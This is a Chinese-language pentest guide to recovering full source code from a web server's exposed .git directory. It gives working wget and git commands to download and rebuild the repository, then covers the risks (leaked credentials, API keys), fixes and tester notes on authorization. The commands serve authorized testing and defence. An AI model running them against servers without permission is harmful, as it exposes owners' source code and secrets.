从暴露的.git目录转储完整源代码 - 详细技术指南

漏洞背景

当Web应用程序的生产环境中意外暴露.git目录时，会导致严重的安全风险。.git目录是Git版本控制系统的核心，包含：

• 完整的源代码历史记录
• 所有分支和提交信息
• 可能的敏感配置文件和凭证
• 开发过程中的调试信息和注释

漏洞发现

1. 侦察阶段：通过目录模糊测试发现/.git/目录
2. 确认方法：直接访问https://<目标IP>/.git/查看是否返回目录结构
3. 法律前提：确保已获得客户书面授权，明确测试范围包含此行为

完整转储步骤

第1步：创建本地工作目录

mkdir -p ~/git-dumps/repo

• mkdir -p：递归创建目录结构
• ~/git-dumps/repo：建议的标准存储路径，保持组织有序

第2步：递归下载.git目录

wget -r -np -nH --cut-dirs=1 https://<目标IP>/.git/ -P ~/git-dumps/repo --no-check-certificate

参数详解：

• -r：递归下载整个目录结构
• -np：不追溯至父目录，限制在.git目录内
• -nH：不创建以主机名命名的额外目录
• --cut-dirs=1：跳过URL中的第一级目录
• --no-check-certificate：忽略SSL证书错误（对IP访问特别有用）
• -P：指定下载存储路径

第3步：清理干扰文件

cd ~/git-dumps/repo
find . -type f -name "index.html*" -delete

• 删除可能存在的干扰性index.html文件
• 这些文件可能是防御措施或占位符

第4步：验证和优化Git仓库

git fsck --full
git gc --prune=now
git repack -a -d

命令作用：

1. git fsck --full：验证仓库完整性，检查所有对象是否完好
2. git gc --prune=now：执行垃圾回收，删除无用对象
3. git repack -a -d：重新打包对象，优化存储

第5步：重建完整源代码

mkdir -p ~/git-dumps/workdir
git --git-dir=~/git-dumps/repo --work-tree=~/git-dumps/workdir checkout -f
ls -la ~/git-dumps/workdir

关键参数：

• --git-dir：指定.git目录位置
• --work-tree：指定源代码检出位置
• checkout -f：强制检出，覆盖现有文件

漏洞危害分析

成功转储后可能发现：

1. 源代码暴露：完整后端逻辑、业务实现
2. 敏感凭证：数据库连接字符串、API密钥、加密密钥
3. 历史漏洞：提交历史中修复的漏洞信息
4. 基础设施信息：服务器配置、内部网络拓扑

攻击者可利用这些信息：

• 直接复制知识产权
• 发起针对性攻击（如SQL注入、RCE）
• 访问内部系统和云资源
• 分析业务逻辑漏洞

修复建议

1. 立即措施：

   • 从生产服务器移除.git目录
   • 轮换所有暴露的密钥和凭证
   • 限制直接IP访问

2. 长期防护：

   • 部署前构建清理流程，确保不包含.git目录
   • 在Web服务器配置中禁止.git目录访问
   • 自动化部署流水线中加入.git检查

3. 监控措施：

   • 设置日志监控对.git目录的访问尝试
   • 定期扫描自身暴露的敏感信息

防御性开发实践

1. 使用.gitignore文件排除敏感文件
2. 实施预提交钩子检查敏感信息
3. 采用环境变量而非配置文件存储凭证
4. 部署前使用静态分析工具扫描代码

测试人员注意事项

1. 始终在授权范围内操作
2. 发现后立即停止进一步探索并报告
3. 处理转储数据时保持安全，避免二次泄露
4. 提供详细的复现步骤和影响证明

此技术文档提供了从暴露的.git目录恢复完整源代码的完整流程，同时强调了相关的安全风险和防御措施。